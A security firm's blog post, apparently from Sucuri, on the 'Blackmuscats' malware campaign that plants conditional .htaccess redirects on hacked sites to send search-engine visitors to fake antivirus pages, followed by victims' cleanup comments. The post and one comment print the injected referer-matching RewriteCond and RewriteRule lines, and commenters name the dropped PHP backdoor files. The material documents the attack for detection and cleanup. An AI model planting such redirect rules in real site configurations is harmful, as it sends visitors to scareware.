Blackmuscats Conditional Redirections to Fake AntiVirus

We are seeing many sites today compromised with the Blackmuscats conditional redirection. This malware causes anyone visiting the hacked site to be redirected to a Fake AV (AntiVirus). Why Blackmuscats? All the compromised sites have .htaccess redirections pointing to files ending in “blackmuscats?5″.

So far we have detected more than 8,000 sites with this type of redirection and the number is growing (last night we had only found a few hundred).

Note: this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

Here are some of the domains being used as part of this malware campaign:

1297 redirections
1156 redirections
1077 redirections
1001 redirections
975 redirections
391 redirections
329 redirections
263 redirections
244 redirections
223 redirections
206 redirections
192 redirections
80 redirections
65 redirections
.. many more..

This is what the .htaccess looks like on the hacked sites:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace).(.*)
RewriteRule ^(.*)$ [R=301,L]

What happens next?

So what happens next? If someone visits a compromised sites by clicking on a search engine results page, they will be sent to one of those domains we listed above, and then to (and similar AV related domains): ( -> redirection to -> (

This is where you get those scary warnings like “Your computer is compromised”.

We will post more details as we keep monitoring it.

About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development. You can find more about Daniel on his site or on Twitter: @danielcid

  • Vaness Roche

     I was the victim of this attack, my site is no longer accessible. what should I do please?

    • David Dede

      You have to clear the .htaccess file that the attackers added. Sucuri also offers clean up packages:

  • Travis

    Searching desperately for steps I can take to remove this from my websites.

  • Ricki

    My websites were infected, it started a few days ago. It seems like after I clean it up, it reappears. I must not be getting the root, it’s like some kind of flash virus.

    • Travis

      Same here, cleaning .htaccess solved problem temporariliy.  If you find root, could you please kindly post it here?

      • Ricki

         Of course

  • Raitchev_alex

    same by me… five sites under attack.   i did not find the issue… editing htaccess fixed temporary. google report it as spam site..

  • Raitchev_alex

    temporary: disable friendly urls and delete htaccess file…

  • Ig_design

    i use joomla and have this on my site..but can’t find anything wrong in the .htaccess file something interesting is that it redirects me to not to any other sites. Can anyone tell me how to fix this

    • Coby_cats

       I have to same problem on two sites that I worked on yesterday. I know wish I hadn’t…

  • Raitchev_alex

    i deleted .htaccess files but they apeared again… anytime after couple of time

  • Raitchev_alex

    somebody fixed this problem?

    • Ig_design

       i tried to delete the .htaccess files and now in redirects me even when i type the url directly not only in google etc. the interesting thing for my site is that it redirects me to not any other site

  • Fabio Cuzzi

    Any news about how to get rid of this?

  • Montana

    I was hacked for couple of day’s ago.

    I found that there were a security issue with a component “com_jce” and i removed it and installed a newer version.

    I also found a couple of files in:

    I removed them and now everything seems to work again. I hope!

    No more hacked .htaccess file.

    • Travis

      Thank you so much for posting this.  I found the story.php and a similar .cache_xxx.php file (the string of letters was different for me).  So far it seems deleting these files does stop the htaccess re-writes.  Thank you again for sharing what you found.

      • Montana

         Ok, nice. But you have to check if you have any component that is outdated. There may be a security hole there for the hackers to get in. They got in the first time, now you have to prevent a second time.

        • Travis

          Like you, there was an outdated JCE component on the site with the malicious .php files.  In the process of updating everything right now, all passwords have already been changed.  The hardest part was finding the malicious code, and your post helped greatly with that.  Thanks again.

          • Montana

            Glad I could help you!

  • Pingback: Redirection Malware Very Good Leads to Fake AV | Sucuri()

  • Dean

    Thank you! A search for “.cache” revealed the source of my .htaccess issues. Never was a fan of Joomla, but now will turn people away who want it.

  • BigD

    Thanks, saved me a lot of trouble finfding the infection.

    For info this is what I found in my htaccess file – in white so it was hidden! Hope it helps.

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.*)

    RewriteRule ^(.*)$ [R=301,L]

    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)

    RewriteRule ^(.*)$ [R=301,L]

  • Gee

    I found codes in .htaccess file and deleted it but still appears after 1-2 hours later. I could not find “.cache_pchuyx.php” or story.php file. I also uninstalled “com_jce” component, still redirects…. please help me… this is infected my 6-7 websites… Thanks

  • sadouliev15 .

    To fix the redirection problems due to malwares there is a solution

Share This